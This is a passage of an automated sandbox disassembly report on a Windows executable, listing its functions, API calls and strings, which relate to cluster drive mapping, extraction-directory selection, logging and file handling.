21854a 1256->1257 1260 217e73-217e76 1257->1260 1258->1260 1270 217de3-217de6 1259->1270 1271 217e5f-217e64 1259->1271 1260->1222 1264 217e78-217e7b call 218e6f 1260->1264 1264->1222 1272 217de8-217e0d call 2184c7 call 218abb 1270->1272 1273 217e0f-217e1e 1270->1273 1271->1257 1272->1273 1282 217e66 1272->1282 1278 217e20-217e23 call 218e6f 1273->1278 1279 217e28-217e39 1273->1279 1278->1279 1279->1249 1282->1257
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetLastError.KERNEL32(?,?,?,00217780,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000), ref: 00217D34
                                                              • GetLastError.KERNEL32(?,?,?,00217780,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000), ref: 00217D6C
                                                                • Part of subcall function 002184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                                • Part of subcall function 002184C7: swprintf.LIBCMT ref: 00218513
                                                              Strings
                                                              • Drive map for cluster resource '%S' : '%S', xrefs: 00217DEE
                                                              • Failed to initialize the Cluster API, xrefs: 00217D1F
                                                              • Failed to open the current cluster, xrefs: 00217D55
                                                              • Failed to allocate an empty drive map, xrefs: 00217D02
                                                              • Failed to open the clsuter enumeration for resources, xrefs: 00217D8D
                                                              • Failed to concatenate to the cluster drive map, xrefs: 00217E66
                                                              • Failed to get the next resource in the cluster enum, xrefs: 00217E4B
                                                              • Considering cluster resource: '%S'..., xrefs: 00217DB5
                                                              • Failed to get cluster drive map from resource, xrefs: 00217E5F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocLocalProcessTimeswprintf
                                                              • String ID: Considering cluster resource: '%S'...$Drive map for cluster resource '%S' : '%S'$Failed to allocate an empty drive map$Failed to concatenate to the cluster drive map$Failed to get cluster drive map from resource$Failed to get the next resource in the cluster enum$Failed to initialize the Cluster API$Failed to open the clsuter enumeration for resources$Failed to open the current cluster
                                                              • API String ID: 196121278-1807027133
                                                              • Opcode ID: ef293ff5bab2d6d61cf71a1becb602b180763694e81d4f4b4bd524a0d8592bf7
                                                              • Instruction ID: 05f5c68f8e4d39d264f8ca3a20d684f05867fc3edda56f932519547e6a300487
                                                              • Opcode Fuzzy Hash: ef293ff5bab2d6d61cf71a1becb602b180763694e81d4f4b4bd524a0d8592bf7
                                                              • Instruction Fuzzy Hash: 51514D76C2411AEFCF11AFE4DC858EEBAF5AF64300F2545B9E615B2151DB310EE09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B07F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1283 21b07f-21b0a2 1284 21b234-21b23c 1283->1284 1285 21b0a8-21b0a9 1283->1285 1286 21b243 1284->1286 1287 21b23e-21b241 1284->1287 1288 21b15a-21b174 call 218b7e 1285->1288 1289 21b0af-21b0b0 1285->1289 1290 21b246-21b24a 1286->1290 1287->1290 1294 21b226-21b22a 1288->1294 1299 21b17a-21b17f 1288->1299 1292 21b0b2-21b0b3 1289->1292 1293 21b0be-21b0da DosDateTimeToFileTime 1289->1293 1292->1294 1295 21b0b9 1292->1295 1296 21b0fd-21b10c FindCloseChangeNotification 1293->1296 1297 21b0dc-21b0ec LocalFileTimeToFileTime 1293->1297 1294->1284 1301 21b22c-21b22f call 218e6f 1294->1301 1295->1284 1302 21b14b-21b155 1296->1302 1303 21b10e-21b128 call 218b7e 1296->1303 1297->1296 1300 21b0ee-21b0f7 SetFileTime 1297->1300 1304 21b181-21b18c 1299->1304 1305 21b196-21b1b6 call 2196c7 call 2191d3 1299->1305 1300->1296 1301->1284 1308 21b224 1302->1308 1303->1294 1313 21b12e-21b138 1303->1313 1328 21b18e call 2169b0 1304->1328 1329 21b18e call 2164d8 1304->1329 1305->1294 1318 21b1b8-21b1da call 219ca3 1305->1318 1308->1294 1311 21b190-21b194 1311->1305 1314 21b143-21b146 1311->1314 1330 21b13a call 2169b0 1313->1330 1331 21b13a call 2164d8 1313->1331 1314->1294 1317 21b13d-21b141 1317->1302 1317->1314 1321 21b1dc-21b1e6 GetLastError 1318->1321 1322 21b1ff-21b210 SetFilePointer 1318->1322 1325 21b1f6 1321->1325 1326 21b1e8-21b1f4 1321->1326 1323 21b221 1322->1323 1324 21b212-21b21f SetEndOfFile SetFilePointer 1322->1324 1323->1308 1324->1323 1325->1294 1327 21b1f8-21b1fd 1325->1327 1326->1325 1327->1294 1328->1311 1329->1311 1330->1317 1331->1317
                                                              APIs
                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0021B0D2
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0021B0E4
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0021B0F7
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0021B100
                                                              • GetLastError.KERNEL32(?,40000000,00000001,00000002,08000080,?,00000000), ref: 0021B1DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Time$File$ChangeCloseDateErrorFindLastLocalNotification
                                                              • String ID: %s%S
                                                              • API String ID: 604158762-4203644592
                                                              • Opcode ID: 703444ce1dd9a7c5cf4c056f3097e90f90cd2c217d21214b87f229277f0826b5
                                                              • Instruction ID: f9114e7b7145e8d841da1759d0b2e9d90141a2223265a7644013761d69f502e9
                                                              • Opcode Fuzzy Hash: 703444ce1dd9a7c5cf4c056f3097e90f90cd2c217d21214b87f229277f0826b5
                                                              • Instruction Fuzzy Hash: 15516E75A20706BBDB229FA5DC84BEA77F8EF28310F108529BE19D6150DB70D9A4CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021AB0C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115memoryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1332 21ab0c-21ab3a call 219b6a 1335 21ac51-21ac61 call 2291d5 1332->1335 1336 21ab40-21ab55 ReadFile 1332->1336 1337 21ab57-21ab62 GetLastError 1336->1337 1338 21ab86-21ab8a 1336->1338 1340 21ab71-21ab74 1337->1340 1341 21ab64-21ab6e 1337->1341 1342 21ab98-21abb0 GetProcessHeap HeapAlloc 1338->1342 1343 21ab8c-21ab93 1338->1343 1340->1335 1345 21ab7a-21ab81 1340->1345 1341->1340 1346 21abb2-21abb9 1342->1346 1347 21abbe-21abcb 1342->1347 1343->1335 1345->1335 1346->1335 1348 21abce-21abe9 ReadFile 1347->1348 1349 21ac01-21ac0c GetLastError 1348->1349 1350 21abeb-21abf1 1348->1350 1352 21ac1b-21ac1e 1349->1352 1353 21ac0e-21ac18 1349->1353 1350->1348 1351 21abf3-21abf6 1350->1351 1354 21ac29-21ac2f 1351->1354 1355 21abf8-21abff 1351->1355 1356 21ac20-21ac27 1352->1356 1357 21ac32-21ac35 1352->1357 1353->1352 1354->1357 1355->1357 1356->1357 1357->1335 1358 21ac37-21ac4a GetProcessHeap HeapFree 1357->1358 1358->1335 1359 21ac4c call 219a29 1358->1359 1359->1335
                                                              APIs
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              • ReadFile.KERNELBASE(00000000,00219ECF,00000024,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00219ECF,?), ref: 0021AB4D
                                                              • GetLastError.KERNEL32(?,?,?,?,00219ECF,?,?,00216163,?,?,?,00000000,00000000), ref: 0021AB57
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021AB9C
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021ABA3
                                                              • ReadFile.KERNEL32(00000000,?,?,00000024,00000000), ref: 0021ABE1
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021AC3B
                                                              • HeapFree.KERNEL32(00000000), ref: 0021AC42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$File$ErrorLastProcessRead$AllocFreePointer
                                                              • String ID: $
                                                              • API String ID: 1504513977-3993045852
                                                              • Opcode ID: aa9b545566376cf54026ff8938a946db14ba698f6b2f6382a7c5ba9b46fa9a25
                                                              • Instruction ID: 9b5a775ee199240d323c064753a91d8898aeb43e0cd4bcc2e7a8f8dd1f5a2d08
                                                              • Opcode Fuzzy Hash: aa9b545566376cf54026ff8938a946db14ba698f6b2f6382a7c5ba9b46fa9a25
                                                              • Instruction Fuzzy Hash: 48416D71D21219EFCF119FA9ED48AEDBBF5FF68710B10801AE911E6110C73089A0DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002185B2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 104COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1361 2185b2-2185ef 1362 218702-218705 1361->1362 1363 2185f5-2185fb 1361->1363 1364 2186df-2186e5 1362->1364 1363->1362 1365 218601-218617 GetModuleFileNameW 1363->1365 1368 2186f2-218701 call 2291d5 1364->1368 1369 2186e7-2186ed call 218e6f 1364->1369 1366 218619-218627 call 22de40 1365->1366 1367 21862a-218647 call 219a63 1365->1367 1366->1367 1377 218649-21864b 1367->1377 1378 21864d-218653 1367->1378 1369->1368 1379 218659-21866f GetComputerNameW 1377->1379 1378->1379 1380 218671-21867f call 22de40 1379->1380 1381 218682-218691 call 218e9c 1379->1381 1380->1381 1386 218693-2186d4 call 2184c7 * 3 1381->1386 1387 2186dc-2186de 1381->1387 1393 2186d9 1386->1393 1387->1364 1393->1387
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00210000,00000000), ref: 0021860A
                                                              • _memset.LIBCMT ref: 00218622
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00218667
                                                              • _memset.LIBCMT ref: 0021867A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Name_memset$ComputerFileModule
                                                              • String ID: --- logging level: %s ---$=== Logging started: %S ===$Executable: %S v%d.%d.%d.%d$standard
                                                              • API String ID: 949451329-1073105773
                                                              • Opcode ID: e2a24ee81ecb196f543ddf7752dc9ec5dd3cd20433df38fa06f12f19c036c8a3
                                                              • Instruction ID: 6f639a9c4d25a74ecfa5456d17580cf980317ac3bdabf064c3f864de7707926a
                                                              • Opcode Fuzzy Hash: e2a24ee81ecb196f543ddf7752dc9ec5dd3cd20433df38fa06f12f19c036c8a3
                                                              • Instruction Fuzzy Hash: 8531ABF1D1022D6BCB209B559C85EDBB7FCEB54700F1041B5B608E2142DE705EE58FA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A46E Relevance: 13.6, APIs: 9, Instructions: 63memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(002396F0,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A476
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A494
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A497
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4AC
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4AF
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4C4
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4C7
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,002161FB,00000000,00000000,?,?,?,?,?,00215B19,?,?,?), ref: 0021A4EF
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00215B19,?,?,?,0023BEF0), ref: 0021A4F2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess$ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 128005546-0
                                                              • Opcode ID: 88232dd828cb894baebe34743c0ff61321df2bd772b6649f3ff6350d22cc3d89
                                                              • Instruction ID: 92ee548c34348c3c0d79748f2b28b7e120212f708608cf5bf46effe2ccf50ecc
                                                              • Opcode Fuzzy Hash: 88232dd828cb894baebe34743c0ff61321df2bd772b6649f3ff6350d22cc3d89
                                                              • Instruction Fuzzy Hash: AD014470722212A6EB207FB69D4DFA736DC9FB0B91F544011FD04D6185DAB4DCE08A72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00216F5C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000082,00000000,00217016,0023BEF0,?,?,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000), ref: 00216FD6
                                                              • DialogBoxParamW.USER32(00000000,?,?,00216F09,?), ref: 00216FDD
                                                              Strings
                                                              • Failed while running the extract directory selection dialog., xrefs: 00216FE9
                                                              • Failed to get current directory, xrefs: 00216F8F
                                                              • Failed to select current directory for extraction, xrefs: 00216FA0
                                                              • Failed to select the user-specified directory for extraction, xrefs: 00216FFA
                                                              • Failed to select temporary directory for extraction, xrefs: 00216FB8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: DialogHandleModuleParam
                                                              • String ID: Failed to get current directory$Failed to select current directory for extraction$Failed to select temporary directory for extraction$Failed to select the user-specified directory for extraction$Failed while running the extract directory selection dialog.
                                                              • API String ID: 3900296288-2402499859
                                                              • Opcode ID: 12dd797395199f1dcdc39544eeca66e85c5e8f85a159c2eca981309d6c83e0e1
                                                              • Instruction ID: 18ab9dc9ce766d2870bf6b2d52f29e63cc1f0245c63842522013120174228bb4
                                                              • Opcode Fuzzy Hash: 12dd797395199f1dcdc39544eeca66e85c5e8f85a159c2eca981309d6c83e0e1
                                                              • Instruction Fuzzy Hash: 87112932978710AE8F326E14AC49CFE73E9DAB57703210116F845A6441A9618DF34A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219A63 Relevance: 10.6, APIs: 7, Instructions: 88memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,?,00000000,?,00000208,?,?,?,?), ref: 00219A98
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00219AA4
                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00219AD0
                                                              • GetFileVersionInfoW.KERNELBASE(?,?,00000000,00000000,?,?,?,?), ref: 00219AEC
                                                              • VerQueryValueW.VERSION(?,002150AC,?,?,?,?,?,?), ref: 00219B06
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00219B10
                                                              • GlobalFree.KERNEL32(?), ref: 00219B49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileGlobalInfoLastVersion$AllocFreeQuerySizeValue
                                                              • String ID:
                                                              • API String ID: 2886811419-0
                                                              • Opcode ID: 51449f72dff1b1323fa491dc29341d60fe6704f611b04ecf7f4bb23ae8694839
                                                              • Instruction ID: 7404d53ad51a91b142919831ea1afcdeb9d15f3d1d9dc7ba40fed0870407eae3
                                                              • Opcode Fuzzy Hash: 51449f72dff1b1323fa491dc29341d60fe6704f611b04ecf7f4bb23ae8694839
                                                              • Instruction Fuzzy Hash: 9D315276D14126EFCB109F94E8888EDBBB4EB24310B154179EE06E7210D6315EE09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021870C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000004,?,?,10/4/2023, 15:57:52,?,?,?,?,002184C0,?,?,00000000,?,00218526,?), ref: 00218738
                                                              • WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218762
                                                              • WriteFile.KERNELBASE(00214DA4,00000002,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218787
                                                              • GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0021878D
                                                              • GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 002187BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$lstrlen
                                                              • String ID: 10/4/2023, 15:57:52
                                                              • API String ID: 3048800281-3636290887
                                                              • Opcode ID: fed268e7a14d920034467c571477749a4c779273949df7f3b07ad5a82cedb231
                                                              • Instruction ID: 2848853b420b443d54a126278abc8fe8ae7297e9cad870f1d5d48810df22b114
                                                              • Opcode Fuzzy Hash: fed268e7a14d920034467c571477749a4c779273949df7f3b07ad5a82cedb231
                                                              • Instruction Fuzzy Hash: 80218B7991010AFFCB109F65DC899EEBBF9EF54390F248425F909D6190DB358AA1CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002337AF Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___set_flsgetvalue.LIBCMT ref: 002337D4
                                                              • __calloc_crt.LIBCMT ref: 002337E0
                                                              • __getptd.LIBCMT ref: 002337ED
                                                              • CreateThread.KERNELBASE(?,?,00233745,00000000,?,?), ref: 00233824
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0023382E
                                                              • _free.LIBCMT ref: 00233837
                                                              • __dosmaperr.LIBCMT ref: 00233842
                                                                • Part of subcall function 0022B059: __getptd_noexit.LIBCMT ref: 0022B059
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 155776804-0
                                                              • Opcode ID: d54791215a48ebed072aa45f3a774baf8aeba198d6a3bd7040f0dede648f0bc2
                                                              • Instruction ID: 5c19ace3d505d398c83ed3df91423d9e3da5125924d71957d7ff22d905f2bff2
                                                              • Opcode Fuzzy Hash: d54791215a48ebed072aa45f3a774baf8aeba198d6a3bd7040f0dede648f0bc2
                                                              • Instruction Fuzzy Hash: A61125B26203167FDB11EFE4FC4699B7B98DF14770B104426FA1496591DB71CB308A61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002168FB Relevance: 10.6, APIs: 7, Instructions: 55synchronizationwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(0023BF10,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021691B
                                                              • LeaveCriticalSection.KERNEL32(0023BF10,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021692C
                                                              • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00216940
                                                              • WaitForSingleObject.KERNEL32(00000278,000000FF,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216952
                                                              • DeleteCriticalSection.KERNEL32(0023BF10,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021696D
                                                              • CloseHandle.KERNEL32(00000278,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216998
                                                              • CloseHandle.KERNEL32(00000274,00000000,?,002163FA,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 002169A4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveMessageObjectPostSingleWait
                                                              • String ID:
                                                              • API String ID: 2807184951-0
                                                              • Opcode ID: ea2cc767e9d725a38bc3912ff7a717c25e5a88881001be319343e36a6a1d9fc9
                                                              • Instruction ID: 854fcedff44db3b2bd270f6e37626c4854a029ffe40d94269be7901da361506d
                                                              • Opcode Fuzzy Hash: ea2cc767e9d725a38bc3912ff7a717c25e5a88881001be319343e36a6a1d9fc9
                                                              • Instruction Fuzzy Hash: BD118B70920262DBC7218F69BD8C9DA77EAB7A47617344606F914F2224DB7588E08B60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00233745 Relevance: 10.5, APIs: 7, Instructions: 39threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___set_flsgetvalue.LIBCMT ref: 0023374B
                                                                • Part of subcall function 0022A57F: TlsGetValue.KERNEL32(?,00233750), ref: 0022A588
                                                                • Part of subcall function 0022A57F: _DecodePointerInternal@4.G5K9HNJ7(?,00233750), ref: 0022A59A
                                                                • Part of subcall function 0022A57F: TlsSetValue.KERNEL32(00000000,?,00233750), ref: 0022A5A9
                                                              • ___fls_getvalue@4.LIBCMT ref: 00233756
                                                                • Part of subcall function 0022A555: TlsGetValue.KERNEL32(?,?,0023375B,00000000), ref: 0022A563
                                                              • ___fls_setvalue@8.LIBCMT ref: 00233769
                                                                • Part of subcall function 0022A5B8: _DecodePointerInternal@4.G5K9HNJ7(?,?,?,0023376E,00000000,?,00000000), ref: 0022A5C9
                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00233772
                                                              • ExitThread.KERNEL32 ref: 00233779
                                                              • GetCurrentThreadId.KERNEL32 ref: 0023377F
                                                              • __freefls@4.LIBCMT ref: 0023379F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                              • String ID:
                                                              • API String ID: 3864649970-0
                                                              • Opcode ID: 7e8afa181cba2dd9655173c3f9c71c52a98dc325ffa1c0a5254a07d5d3aee572
                                                              • Instruction ID: 621d8d810e0e87acf59b32156e0716d095a546049abdb005f8631dcce015d260
                                                              • Opcode Fuzzy Hash: 7e8afa181cba2dd9655173c3f9c71c52a98dc325ffa1c0a5254a07d5d3aee572
